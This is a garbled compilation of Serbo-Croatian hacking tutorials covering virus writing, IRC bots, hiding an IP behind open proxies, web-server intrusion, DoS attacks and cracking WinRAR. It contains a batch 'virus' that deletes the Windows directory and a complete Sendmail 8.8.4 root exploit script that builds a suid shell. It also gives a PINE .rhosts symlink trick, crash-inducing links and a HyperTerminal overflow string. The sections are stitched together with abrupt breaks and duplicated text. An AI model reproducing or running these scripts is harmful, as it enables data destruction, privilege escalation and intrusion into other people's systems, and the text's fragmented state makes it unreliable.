Professional Documents
Culture Documents
Hakovanje
Hakovanje
Pravljenje Virusa
miRC Hack
Kako postati HACKER ?
Hackanje
Hack Web
Hackanje Sifre putem ftp.
Dos Hackanje
Crackanje
Windows Trikovi
Dr.Rame
Pravljenje Virusa
Upoznavanje
Dobro doli u jo jedan tutorial by BaCkSpAcE. Ovaj tutorial moe Vam
pomoi da pravite jednostavne viruse.
Ovdje neu priati on nekoj naprednoj tehnologiji jer je ovaj tutorial za
poetnike. Pa ako ste "elite haker"
ne gubite ovdje vrijeme kad moete obarati sistem Micro$oft-a. hehe...
Ovaj tutorial govori o jednostavnom brisanju fajlova. Pa ako ste se
nadali da ete unititi svijet, ao mi je ovaj tutorial nije za tebe.
Primjer br.1
--------------@echo off
cd\
rd windows
echo TI glupane
echo hahahahhahaha
echo imam te
echo Vidimo se
echo Vozdrica
end
--------------
miRC
./configure
make
make install
./eggdrop -m eggdrop.conf.dist
Nakacite se na server na kome je bot i kucajte /msg BOTnick hello
onda ce on tu nesto smara da si ti owner itd ...
onda setuj pass /msg [botnick] pass "tvoj pass"
... kucas /chat [BOTnick] ... trazice ti pass .... I TO JE TO : )
osnovne komande na botu ...
Dodavanje usera - .+user
Brisanje user .-user [Nick]
Dodavanje hosta .+host [nick] [host]
Ako hoces da dovedes bota na neki kanal kucaj .+chan #kanal
A da zaboravih gore da napisem .. dodavanje flagova ... op - user, m master, n - owner, a - auto op dovoljno za sada ... dodavanje flagova se
vrsi komandom .chattr [nick] +[jedan od navedenih gore] TO ti je
dovoljno za sada detaljnije upustvo ces dobiti na adresi
www.egghelp.com
aaa vec mi je muka ... sad idemo na instaliranje BNC-a : ) znate ono 24h
dnevno vas nick na irc-u : ) yeah : )
Logujete se na shell ... kao ono za bota : ) i kucate
"lynx http://www.psychoid.lam3rz.de/psyBNC2.2.1.tar.gz"
on ce ga tu downlouduje
Dalje kucate ...
tar -zxvf psyBNC2.2.1.tar.gz
cd psybnc
make
make menuconfig
make
i ./psybnc pokrecete BNC i sve je spremno ... ukljucite miRC i
konektujete se na server i port koji ste setovali
KAKO SAKRITI IP ?!
Ukljucite miRC/options/Firewall ... chekirate "Use SOCKS firewall"
Protocol - Socks4 | Host - AAubervilliers-101-2-1-63.abo.wanadoo.fr |
userID - nista | pass - nista |
port - 1080 |
evo jos nekih koji rade po istom principu ...
host - mail.bias.bm | port - 1080
host - 212.136.228.242 | port - 1080
host - server1.scottsbluff.sykes.com | port - 1080
... NickServ,ChanServ,MemoServ,SeenServ ...
.. Blah ovo je po meni shit ... bilo je bolje dok nije bilo chanserv-a .. ono
dobijes op ... TakeOver ubacis bota i ql ; ) ali sta je tu je : )
Evo nekih osnovnih komandi koje bi trebalo da znate na BalcanNet-u ...
/msg nickserv register [pass] [email] - registrovanje nick-a
Hackanje
SADRZAJ:
-----------------1. Con, Aux i Nul Exploit
(by BaCkSpAcE)
2. SYN Flood Attack
(by BaCkSpAcE)
3. Ping of Death
(by BaCkSpAcE)
4. Exploit za NT 3.5x rachunare
(by BaCkSpAcE)
5. Malo o NT
(by Perun)
6. Stvaranje backspace.bat fajla na serveru
(by BaCkSpAcE)
7. Apache HTTP Server - Exploit
(by Zeroo_Cool, modified by BaCkSpAcE)
8. PHP Path Revealing Vulnerability
(downloaded from Rootshell, translated by BaCkSpAcE)
9. Sakrivanje IP broja u mIRCu
(by BaCkSpAcE}
10. Trik u SoftICE za crackere koji nisu znali
(by BaCkSpAcE)
===============================================
=========
1. Con, Aux i Nul Exploit
-----------------------------------------<
Ovi exploiti provereno rade na Win98 i Win98 SE ali u WinME ne
rade. Oni se javljaju pri ukucavanju sledecih komandi:
c:\con\con
ili c:\aux\aux
ili c:\nul\nul
Nakon ovoga rachunar ce da se zamrzne i jedino reshenje bice
rebootovanje rachunara. Moze da se koristi npr. za Web, tako
shto napravite hiperlink do npr. c:\con\con i kada korisnik pritisne
na to rachunar se zaledi ili slichno. Reshenje problema je skidanje
zakrpe sa Micro$oftovog sajta ili da predjete na Linux, ako to vec
niste uradili.
===============================================
=========
2. SYN Flood Attack
--------------------------------Shta je to SYN Flood Attack? To je ustvari jedna vrsta Denial of
Service napada.Syn Attack radi tako shto napadach shalje zrtvi
Syn Request da se konektuje na server zrtve, a zrtva odgovara
sa ACK, i rezervishe buffer (mesto u memoriji) za tu konekciju.
Napadach neodgovara sa ACK nego shalje SYN Request ponovo,
i zrtva ponovo odgovara sa AK i odvaja buffer i sve tako dok
zrtva neostane bez Buffer Space i krashira se. Ovom vrstom
necete naneti skoro nikakvu shtetu WebMasteru. On ce morati,
posle SYN Flood Attacka, da rebootuje rachunar. NT je po defaultu
podeshen da shalje SYN-ACK na 3,6,12,24 i 48-oj sekundi. Posle
slanja zadnjeg SYN-ACK, serveru je potrebno 96 sekundi da
print(u.toString());
print(s1);
}
.......
---------------------------------------------------------------------Microsoftu je javljeno za ovaj problem 14.10.2000 i rekli su da josh
uvek rade na tom patchu. Ako ste zainteresovani idite na sajt
microsofta pa se informishite!
===============================================
========
6. HyperTerminal Buffer Overflow Vulnerability
-----------------------------------------------------------------------------Sistemi koji podrzavaju ovaj problem su Windows 2000, Windows
ME, Windows 98 i Windows 98SE. Ova rupa dozvoljava da se
uradi buffer overflow u HyperTerminal Telnet Clientu i moze da
dozvoli napadacu da izvrshi neki kod na drugom sistemu. Ako
korisnik otvori HTML poruku koja ima ovaj HTML kod, onda ce
isti korisnik da nastrada. Evo vam primera:
telnet://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaa/
Patchovi:
Windows 98 i 98SE
http://download.microsoft.com/download/win98/Update/12395/W98/
EN-US/274548USA8.EXE
Windows ME
http://download.microsoft.com/download/winme/Update/12395/Win
Me/
EN-US/274548USAM.EXE
Windows 2000 (problem se otklanja instaliranjem Service Packa br.1)
http://www.microsoft.com/downloads/release.asp?releaseid=25112
===============================================
========
7. Osnove Linuxa - Prvi deo
-----------------------------------------------Linux? Sta je to? Treba li to ikome? Cemu sluzi? Valja li to? Radi li to pod
Windowsima? I jos hiljade pitanja o Linuxu. Sta je, zaista Linux? Treba li
vam? Mozete li ziveti bez njega? Zasto uopse citate ovaj umetak? Hocete
li nesto nauciti ili cete samo izgubiti vrijeme?
Vec nekoliko godina koplja se lome oko Linuxa. Suprotstavljene su dve
sobe, druge zgrade ili drugog kraja svijeta) raditi kao da sjedi u vaoj
sobi za vaim raunalom.
Ideja viekorisnikog stroja je, dakle, napraviti takvu okolinu u kojoj e
svatko, bez obzira gdje se nalazi i da li za vaim raunalom netko ve
radi, moi pristupiti raunalu i raditi kao da sjedi za njim. Pri tome e
imati jedan dio diskovnog prostora samo za sebe, koji e biti zatien od
nepoeljnih, ali e moi bez ikakvih ogranienja dijeliti eljene datoteke
s drugim osobama.
Multitasking je sposobnost operativnog sustava (ne raunala nego ba
operativnog sustava) da izvrava vie programa odjednom. Iako ulazei
dublje u analizu multitaskinga neizbjeno dodirujemo podruje
multiprocesorskih raunala, za ugodan multitasking dovoljno nam je i
raunalo s jednim procesorom.
Multitasking, dakle, ne ovisi o raunalu niti o procesoru, ve o
operativnom sustavu koji koristite. Tako primjerice Amiga i Macintosh
raunala imaju OS od samog poetka raen s idejom multitaskinga, dok
PC
raunala imaju vrlo arenu ponudu operativnih sustava s nekoliko
razliitih mogunosti multitaskinga.
Poevi jo od starog MS DOS-a, koji nikad nije bio zamiljen kao OS s
mogunostima multitaskinga, preko Windows 3.x serije koja je
"dodavala"
DOS-u mogunost izvravanja vie programa istovremeno (ili nekih
programa
nezavisnih proizvoaa, poput DesqView-a), sve do Win95 i WinNT koji u
raunalo uvode kvalitetne multitasking mogunosti. U igri je ak i
Calderin OpenDOS, kopija MS DOS-a koja ima ugraen multitasking.
Za razliku od OpenDOS-a i Windowsa, Linux od samog svog nastanka
radi kao
multitasking OS koji za sobom ne vue potrebu za kompatibilnou s
starijim verzijama.
Mo multitaskinga najbolje ete osjetiti radite li imalo zahtjevnije
poslove za raunalom. Trebate li raunalo samo da biste na njemu
izvravali jedan program (Word, bazu podataka, program za crtanje..)
onda
vam multitasking i nije pretjerano koristan (iako je zgodno odigrati
Solitaire dok baza traga za podacima). No, trebate li istovremeno
pokrenuti nekoliko programa, multitasking je jedino rjeenje.
Primjerice,
osoba iz prethodnog poglavlja ba mora taj as napisati neki dokument
dok
vi radite ozbiljne stvari na raunalu (Doom i slino). Vee li se preko
terminala moi e bez problema uraditi svoj posao dok se vi zabavljate.
Pri tome neete zasmetati jedno drugome, niti ete imati potrebe
razmiljati da li jo tko osim vas radi na raunalu - Linux sam brine o
opsluivanju oba korisnika.
Linux je dosta skroman po izboru hardwarea na kojem eli raditi.
Zavrtjeti
ga moete i na 386SX raunalu s 4MB memorije i Hercules video
karticom.
Iako je to takorei zastario procesor, na njemu Linux radi jednako kao i
na 486 ili Pentium procesoru - razlika je jedino u brzini izvravanja
programa.
Nekakav logian minimum bilo bi 486 raunalo s 8MB memorije, na
kojem se
Linux dosta ivlje ponaa, i to je najmanja konfiguracija u kojoj moete
relativno ugodno raditi u XWindows suelju (Linuxovo grafiko suelje,
zapravo uobiajeno grafiko suelje Unixa). Ve s 16MB memorije Linux
se
osjea komotno, a s jaim procesorom i vie memorije moete samo
profitirati. Linux ne pati toliko na procesor koliko na memoriju, pa ete
dodavanjem vie memorije bolje profitirati nego stavljanjem novog
procesora. Osobito imate li manje od 8MB memorije u raunalu.
Diskovni prostor je gotovo jednako tedljiv. Neke od Linux distribucija
su
gotovo u cijelosti raene tako da se mogu pokretati s CD-a, pa je sve to
trebate uiniti - staviti CD u ita i pokrenuti Linux, koji e za svoje
najminimalnije potrebe (ne vie od nekoliko megabajta prostora ako ne
trebate swap datoteku) koristiti DOS particiju, a najvei dio Linuxa bit
e uitavan s CD-a.
najmanja "normalna" instalacija Linuxa na disk bila bi oko dvadesetak
MB.
Unutar tih 20-tak MB moete smjestiti sve najosnovnije stvari,
ukljuujui
tu i C prevodilac. Moete instalirati i neku iz serije "MiniLinux"
distribucija, koje zauzimaju ak i manje prostora.
Dakako da s tako "osakaenim" Linuxom neete imati sve prednosti koje
vam
prua kompletnija distribucija, koja bi zauzela od 50 do 500MB prostora
na
disku, ovisno o eljama i potrebama. Nekakva srednja vrijednost bila bi
100-150MB prostora za ugodan rad s paljivo biranim alatima.
Grafika kartica moe biti bilo koja VGA kartica, ak i CGA, EGA ili
Hercules. Imate li negdje u pranjavom podrumu Hercules karticu i
monitor
moete i nju staviti u raunalo, a Linux e ju moi iskoristiti.
Pristup vaeg Linux raunala svijetu ostvarivat ete obino jedan od ova
dva naina: Ethernet karticom ili modemom. Zato je neophodno imati
jedno
od to dvoje. S Ethernet karticama nema problema, podrano je sve na
to u
normalnim uvjetima moete naii. Modem isto tako moe biti bilo koji,
vanjski ili ugradivi. Ali ako moete izbjegavajte P&P podrku - iskljuite
ju na svakoj kartici koju moete iskljuiti, utedjet ete si dosta
vremena oko konfiguriranja raunala i traenja greaka.
Poeljno je, uglavnom zbog problema pri instalaciji, imati ATAPI CDROM.
Razlika izmeu ATAPI i ostalih pogona je to se ATAPI pogoni veu na
HDD
kontroler, kao disk. Ostali se obino veu na neku karticu u raunalu.
Nemate li ATAPI CD-ROM, nemojte oajavati, Linux e vjerojatno
prepoznati
i va. Ako ga ne prepozna, morat ete mu runo objanjavati koji pogon
imate u raunalu.
WEB HACK
_-SADRZAJ-_
-Objasnjenje
-Kad ovo procitas...
-Sta je potrebno
-Kako ostati anoniman?
-Shell Account...?
-Malo osnovnih Unix komandi
-Nalazenje informacija o siteu
-Iskoristiti rupu
-Ostalo
_-OBASNJENJE-_
-Ovaj tutorial sam napisao jer mi je dokurrcilo da me svako pita ovakve
stvari "Molim te mi reci kako da unistim ovaj site!","Ajde plz. imam
samo X godina" ili "Ajde molim te unisti ovaj site,jako me nervira
webmaster".
-E sad,sto se tice flame-a,mozete zaboraviiti na to,jer ja znam koliko je
ovo lame,i
napisao sam samo da bi me ostavili na miru.I znam da je ovaj tutorial
los,i da ne bi
trebao da postoji,ali boli me kurac.Vec mi je dosadilo da me 1000 ljudi
pita istu stvar,od
sad cu samo da dam link do ovog tutoriala.ZATO postoji ovo.
-Ja ne odgovaram za ono sto radite posle ccitanja ovog tutoriala,ovaj
tutorial samo govori kako se to radi,ne savetujem vam da to radite.
_-STA JE POTREBNO-_
E,za ovaj tutorial nije potrebno imati unix.Mislim,bilo bi mnogo bolje da
imas unix,ali znam da
te mrzi da instaliras... Sve u svemu potrebno je par wingate adresa i
shell account.Bez brige,
objasnicu sta je sta.
Posto i oko ovog ima tona tutoriala,necu zalaziti u
detalje.Uglavnom,wingate je adresa na kojoj
se nalazi programcic koji je veoma slican proxy-u.Postoji mnogo lose
konfigurisanih wingate-a i
to se moze iskoristiti kako bi se postigla neka
anonimnost.Anonimnostcete postici tako sto cete
se povezati preko telnet klijenta.Kasnije o tome.Shell account...sad cu
jako da pojednostavim.
To je kao racun na nekom kompjuteru koji sluzi da biste mogli da
koristite taj kompjuter sa
njegovim uslugama,ali sa odredjenim privilegijama.Ako ovo nije
jasno,onda procitaj recenicu
jos jedno 10 puta,ako ni onda nije jasno,idi u kuhinju,nadji ogroman noz
i ubi se ko siroce.
I trebace jedan port scanner.To je program koji gleda otvorene portove
na nekom racunaru.
Portovi su kao vrata preko kojih se povezes na neki racunar i koristis
usluge.Ako je na primer
otvoren port pod brojem 21,onda to znaci da taj racunar ima FTP
deamon,to je program koji
pruza usluge FTP-a (File transfer protocol). To je ono sto vam treba.
_-KAKO OSTATI ANONIMAN-_
Pa..ne mozes ostati potpuno anoniman.Ali moze se ostati dosta
anoniman (mogu misliti kako je
ovo bilo gramaticki tacno,moj fond reci nije ogromoan,tako da se
izvinjavam).Ja cu reci kako se
moze ostati anoniman preko wingate-a.Postoje mnogi site-ovi na kojima
se moze naci lista
wingate-a, a jedan od takvih site-ova je www.cyberarmy.com/lists
Tamo izaberete wingate,i ima jako puno adresa i portova (pricao sam o
portovima).Recimo da ima
neka ovakva adresa: 213.43.22.11 (lupio sam adresu) koja je na portu
1080.Treba uraditi
sledece:
Pokrenete telnet.To radite tako sto idete na Start,pa Run,i onda upisete
telnet.Pojavice vam se
jedan program,koji bas i nije prelepog dizajna,ali to nije ni vazno.Idete
na Connect i onda
Remote System.
Posle toga u Hostname ukucate adresu na kojoj smo rekli da je
_-ISKORISTITI RUPU-_
E sad.Postoje stvari koje se zovu exploiti.To su programi koji iskoriste
rupu u programu.Sa ovim
exploitima moguce je dobiti root na nekom serveru (root je svemocni
user,ima sve privilegije).
Postoji vise vrsta exploita.Kao sto su Remote (ovo cemo mi koristiti)
,Local i DoS.
Mi cemo koristiti remote.Exploiti su 95% pisani u C-u,a ponekad i u
PERL-u.E sad...posto vec
imamo informacije o site-u ostaje nam da nadjemo exploit i udjemo u
server.Postoje site-ovi
gde se oni mogu naci.
Dva najpoznatija i najbolja site-a su http://packetstorm.securify.com i
http://www.hack.co.za
Tamo nadjite exploit za ono sto ste zapisali.Vazne su verzije programa!
E sad kada ste skinuli exploit i stavili ga na shell account preostaje samo
kompajlirati exploit
i pokrenuti ga.
--Ako je exploit napisam u C-u onda treba uraditi ovo:
zaista
dugo trajat. Bilo kako bilo, znate sta treba da radite, imate mnogo izbora
pa bujrum.
3. Faza
Ova faza je povezana sa drugom. Naime ako na stranici postoji
POP3 otvoren port, onda isto korstite wwwhack kao i kod
FTP-a. Naravno program ce vas o svemu obavjestiti kada sta otkrije.
4. Faza
U ovoj fazi vam ne treba nista samo program :))
Ovdje cemo korisit DoS napade. Ko nezna sta je to, neka
skine tutor o tome na nhs-ac sajtu i nauci to.
Medjutim sa ovom tehnikom mozete samo "oborit" server.
Ipak, procitajte o tome u posebnom tutoru.
samo skrecem paznju na bug i errors koji se javljaju koji ce vam stvoriti
problema do root access.
root access.
poznati exploit Sendmail v.8.8.4
It creates a suid program /tmp/x that calls shell as root. Ovako treba da
izgleda kad ga nastimate
cat << _EOF_ >/tmp/x.c
#define RUN "/bin/ksh"
#include<stdio.h>
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]
*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd
/tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi
Ovo je pine exploit namjenjen za linux potrebu
Creating a symbolic link from /tmp/.hamors_lockfile to
~hamors/.rhosts(for a generic
example) will cause PINE to create ~hamors/.rhosts as a 666 file with
PINE's process id
as its contents. One may now simply do an echo "+ +" >
/tmp/.hamors_lockfile, then rm
/tmp/.hamors_lockfile.
* REM - Komentar
Primjer: c:\> rem garnet i nhs-ac.cjb.net -nista posebno :))
* PAUSE - Pauza
Primjer: c:\> pause -za daljni radi pritisnite ENTER
* DATE - Ispis datuma
Primjer: c:\> date
* TIME - Ispis vremena
Primjer: c:\> time
* TYPE - Ispis sadrzaja fajla
Primjer: c:\> type garnet.txt -ispisuje sadrzaj fajla garnet.txt
* ATTRIB - Zastita fajlova
Primjer: c:\> attrib garnet.exe +h -sakriva fajl garnet.exe "Hiden"
Primjer: c:\> attrib garnet.exe +r -zasticuje garnet.exe od editovanja
"Read only"
(Ako zelite odkljucati fajl, onda umjesto "+", stavite "-")
* ECHO - Ispis teksta
Primjer: c:\> echo on -pokazuje tekst
Primjer: c:\> echo off -sakriva tekst
* /? - Help
(Za svaku ovu komandu mozete upisat /? i dobit cete
pomoc za tu komandu)
Primjer: c:\> attrib /?
"uzmite u ruke".
Problem je u tome sto se veoma tesko moze zastitit od ovih vrsta napada
jer se
jednostavno koriste normnalne systemske komande.
Evo vam sad vrste DoS napada i malo objasnjenje za svaku.
* Land
Ovdje se radi o takvom napadu sto salje na otvoreni port SYN paket koji
moze
da system obori.
* Smurf-napadi
Ovdje se salje sto vise pingova da bi se dobio sto veci broj odgovora i
tako
bi srusio system zrtve. Za 100 pingova dobija se 1000 odgovora.
* OOB-napadi
* Kao i sto svi znate ovaj napad je najpoznatiji a i najednostavniji.
Medjutim radi samo
na Win 95 dok je Win 98 zasticen od ovog napada. Njegova funkcija je u
tome sto
salje neke bezvezne znakove na odredjenu masinu i dovodi do Blue
screen of death
(ako neznate sta je Blue screnn of death, mozete procitat u ovom
tutorialu)
* SYN flood
* Jedna TCP konekcija izmeu dva sistema ostvaruje se preko tkz.
"three-way-handshake".
1) Sistem A---->Sistem B : SYN ("Hou vezu s tobom")
2) Sistem B---->Sistem A : ACK/SYN ("Dobro uzeo sam to uobzir)
3) Sistem A---->Sistem B : ACK ("Dobro,ja se takoer slaem")
Sad se jednostavno u jednom SYN paketu daje pogrena adresa (jedna
koja i nepostoji),
i time ne dolazi na sisitem B- paketa odgovor (ACK), jer i nepostoji
adresa.
Ali sistem B eka jo odreeno vrijeme na odgovo, sve dok ne doe
"connection timeout".
U tom vremenu se mora sistem B sa to vie ping-ova prenapuniti.
Posljedica je da se
sisitem B prenapuni, tako da za odreeno vrijeme vie ni na jedan SYNpaket odgovori.
* Ping of Death
* Za ovaj napad sluzi obicna komanda koja glasi: "ping adresa -n
9999999"
Kada se posalje ova naredba na odredjeni server, onda on pocinje da
obradjuje, ali
posto se poslalo oko milion pingova, onda server sporo obradjuje i
jednostavno se
srusi, dolazi do Buffer Overflow.
Medjutim za ove napade je davno izasao patch i nevazi na jacim
serverima.
(Nemoze te koristit ovaj napad sa slabijim mashinama)
* To bi bilo to, jos samo da napomenen ono sto sam rekao na pocetku a
to je da
se veoma tesko zastitit od ovakvih napada. Zato nabavite zastitu da vas
lameri
neuznemiravaju bezze :))
barem su
ova osnovna. Za svaki ovaj program upisite /? ako zelite dobiti kratki
help.
Npr: C:\> ping /?
Uvod:
Sta je Cracking?
Cracking je jedna vrsta expresije.Ako hoces crack-ovati mozes uvidjeti
da nije lako
razumijeti ispocetka neke osnovne tocke crackinga ali nakon sto ih
razumis imaces potrebno znanje i iskustvo za daljnje usavrsavanje
crackinga.
Ovaj text ce objasniti neke osnovne tacke crackinga,nadam se da cete
razumijeti nacin na koji cu neke tacke objasniti.
Korak 1:
Ovaj text je napravljen za sve pocetnike na netu koji nerazumiju ili
neznaju nista
o ASM-Codu ili o internalnoj funkciji aplikacije.
Potrebni Software:
Za pocetak jedino sto ce nam trebati je W32Dasm8.9 (Windows
disassembler) i HIEW (to je jedan od boljih Hex-Editora mislim da je
najbolji za pocetak).To je sve za pocetak.
Sad malo znanja:
Kao sto mozda znate nije lako rukovati sa svim tim asm-codovima i
mislim da mnogi neznaju puno o njima,tako da cu obajsniti najpotrebnije
komande.
Moramo znati da svaka dva broja u asm-codu predstavljaju jedan bajt
(byte).
Broj 73536357 =4 bajta (bytes).75 je jedan bajt (byte) 43 je jedan bajt i
45 je jedan bajt.Sad imamo 4bajta.Ako zelimo da ih promjenimo kasnije
znamo da trebamo promijeniti uvijek dva brooja sa dva druga broja.
Sad par stvari o brojevima koje ces vidjeti kada disassemble exe. fajl.
je (hexadecimala je 74) = jump if equal (skoci ako je jednak)
jne (hexadecimala je 75) = jump if not equal (skoci ako nije jednak)
nop (hexadecimala je 90) =no operation (nema operacija)
call (nema hexadecimale) = call a operation (poziva operaciju)
jmp (nema hexadecimale) = jump to string/operation (skok na operciju)
Ovih pet stvari ce nam trebati za pocetak.
Ok sad cemo pogledati sta oni zapravo rade u asm-codu.
Korak 1:
Ovaj text je napravljen za sve pocetnike na netu koji nerazumiju ili
neznaju nista
o ASM-Codu ili o internalnoj funkciji aplikacije.
Potrebni Software:
Za pocetak jedino sto ce nam trebati je W32Dasm8.9 (Windows
disassembler) i HIEW (to je jedan od boljih Hex-Editora mislim da je
najbolji za pocetak).To je sve za pocetak.
Sad malo znanja:
Kao sto mozda znate nije lako rukovati sa svim tim asm-codovima i
mislim da mnogi neznaju puno o njima,tako da cu obajsniti najpotrebnije
komande.
Moramo znati da svaka dva broja u asm-codu predstavljaju jedan bajt
(byte).
Broj 73536357 =4 bajta (bytes).75 je jedan bajt (byte) 43 je jedan bajt i
45 je jedan bajt.Sad imamo 4bajta.Ako zelimo da ih promjenimo kasnije
znamo da trebamo promijeniti uvijek dva brooja sa dva druga broja.
Sad par stvari o brojevima koje ces vidjeti kada disassemble exe. fajl.
je (hexadecimala je 74) = jump if equal (skoci ako je jednak)
jne (hexadecimala je 75) = jump if not equal (skoci ako nije jednak)
nop (hexadecimala je 90) =no operation (nema operacija)
call (nema hexadecimale) = call a operation (poziva operaciju)
jmp (nema hexadecimale) = jump to string/operation (skok na operciju)
Ovih pet stvari ce nam trebati za pocetak.
Ok sad cemo pogledati sta oni zapravo rade u asm-codu.
je (jump if equal) skace na neku od operacija ako nadje sta trazi.
Primjer:
Igra treba cd da bi se pokrenula. je "jump if equal" je komanda koja
provjerava ima li cd-a u drive-u.cd je nadjen (equal) i nastavlja se dalje
u asm-codu (jump if equal).
jne (jump if not equal)
Primjer:
Igra treba cd da startuje. jne "jump if not equal" komanda provjerava da
li je cd u drive-u.Ukoliko cd nije u drive-u dobijate poruku koja vas
obavjestava da cd nije u cd drive-u. To je "jump if not equal" ili jne
komanda.
Nop (no operation) nop komanda ubija trenutnu operaciju kao naprimjer
provjeravanje jel password validan.
Call (call a operation) ova komanda poziva operaciju neku.
jmp (jump to a string/operation) jmp komanda nepoziva komande nego
skace na njih.
Nesto o Zastitnim semama:
Ima puno zastitnih stilova koje ces morati nauciti i nauciti kako ih
provaliti.
Imamo "normalne" cd zastite to jeste passwordom zasticene
programe,igre i
vremenski ogranicene programe.
Najlakse zastitne seme za nas su windows error poruke.
U ovome textu cu pokazati kako da razbijemo windows message boxove
i da crackujemo WinRar sa
W32Dasm verzija 8.9 i sa HIEW-om.
Pocinjemo sa Crackingom:
Kao prvo pocecemo sa WinRAR-om. Otvorite program.
Kao prvo sto mozemo vidjeti na vrhu prozora je "WinRar (unregistred
version)"
Sad cemo kliknuti na "Options"
i poslje toga na "Register".Sad ce se pojaviti windows box.Sad stavite u
prostor za text sta god hocete i kliknite na Ok.Sad ce se pojaviti drugi
prozorcic koji ce vam reci da je registracija propala.To je sve sto
moramo znati.Zatvori WinRar95 i idi na Ms-dos.Sad u Norton
Commanderu napravi dvije kopije Winrara.Jedan nazovi WinRAR95.w32
(za W32Dasm89) a jednu nazovi WinRAR95.exx (sacuvana kopija ako
promijenis pogresne bajtove)
Sad startuj W32Dasm89 i idi na "open file to disassemble".Doci ce
prozor i moci ces izabrati fajl koji hoces da disassembliras.
Izabracemo WinRar95.w32.
Sad W32Dasm pocinje disassembling proces.
Kada je exe fajl disassembliran moze biti da necete vidjeti razumljive
znakove nego WINDINGS pisane linije.Ako se ovo desi idite
na"Dissassembler" pa na "font" I KAO ZADNJE "select font".Sad mozete
izabrati font kojeg cete upotrebljavati u W32D.ASM89. Najbolji font je
Arial.Sad cete vidjeti asm-code.
Nece vam reci puno jer predpostavljam da neznate sta te sve komande
znace.
Sad pritisnite dugme blizu "print" pod nazivom "strn ref"
Pojavi ce se prozor.Sad cete moci vidjeti sve error poruke koje se mogu
pojaviti od exe fajla.Mozete li se sjetiti sta je WinRar rekao kad ste
ukucali pogresan registracijski cod?Rekao je "registration failed"
(REGISTRACIJA PROPALA)
Sad gledaj text i trazi tu poruku.Kada je nadjete dupli klik na
nju.Pojavice se isto onaj prozor kojeg ste dobili kada ste ukucali
pogresan registracijski cod.
Ako ste sve ispravno uradili dobicete na ekranu ovo:
:00413A8F 6A6A push 0000006A
:00413A91 E863640000 call 00419EF9
:00413A96 59 pop ecx
:00413A97 50 push eax
:00413A98 FF7508 push [ebp+08]
*ReferenceTo:USER32.MessageBoxA,Ord:0000h
|
:00413A9B E8120B0100 Call 004245B2
:00413AA0 33C0 xor eax, eax
------------------------------------------------------------------
Koji je dobar nacin da se zastitite od virusa kada vec nemate neki antivirus program? Idite na Start/Find i nadjite sve fajlove sa ekstenzijom
EXE i DLL. Selektujte ih, kliknite desnim dugmetom na njih i izaberite
Properties. Pod Attributes selektujte Read-only i onda na OK. Od sada se
fajlovi sa ekstenzijom EXE i DLL, koji su inace meta virusa, ne mogu
menjati posto se oni, od sada, samo mogu citati ( Read-only). Ovakva
vrsta zastite predstavlja problem za update programe tako da pre nego
sto update-ujete morate iskljuciti Read-only.